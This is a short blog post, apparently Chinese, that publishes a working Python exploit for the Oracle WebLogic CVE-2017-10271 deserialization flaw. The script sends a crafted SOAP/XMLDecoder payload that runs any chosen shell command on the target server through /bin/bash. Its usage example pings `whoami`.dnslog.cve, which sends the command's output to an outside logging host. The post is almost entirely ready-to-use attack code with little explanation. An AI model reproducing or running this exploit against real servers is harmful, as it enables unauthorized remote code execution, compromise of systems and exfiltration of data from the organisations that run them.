Weblogic(CVE-2017-10271)漏洞Exp

  • 2017-12-27
  • 1,596
  • 0

文章作者:莫须有
命令格式:python3 CVE-2017-10271.py url command
eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve

# -*- coding: UTF-8 -*-

'''
Created on 2017年12月23日

@author: 莫须有

CVE-2017-10271 EXP

'''

import requests,sys

headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
    'Content-Type':'text/xml'
}

console = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Header>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <java version="1.8.0_131" class="java.beans.XMLDecoder">
 <void class="java.lang.ProcessBuilder">
 <array class="java.lang.String" length="3">
 <void index="0">
 <string>/bin/bash</string>
 </void>
 <void index="1">
 <string>-c</string>
 </void>
 <void index="2">
 <string>%s</string>
 </void>
 </array>
 <void method="start"/></void>
 </java>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body/>
</soapenv:Envelope>'''

help = '''
CVE-2017-10271.py url command
eg:CVE-2017-10271.py http://test.cve "ping \`whoami\`.dnslog.cve"'''

if(len(sys.argv)<3):
    print(help)
    exit()

url = sys.argv[1] + '/wls-wsat/CoordinatorPortType?wsdl'
command = sys.argv[2]

print(command)
try:
    req = requests.post(url, headers = headers, timeout=5, data = console % command)
    if('<faultcode>S:Server</faultcode><faultstring>0</faultstring>' in req.text):
        print('Success!')
    else:
        print('Fail!')
except:
    print('Error!')
感谢打赏!
支付宝

评论

还没有任何评论,你来说两句吧

你必须 登录 才能发表评论.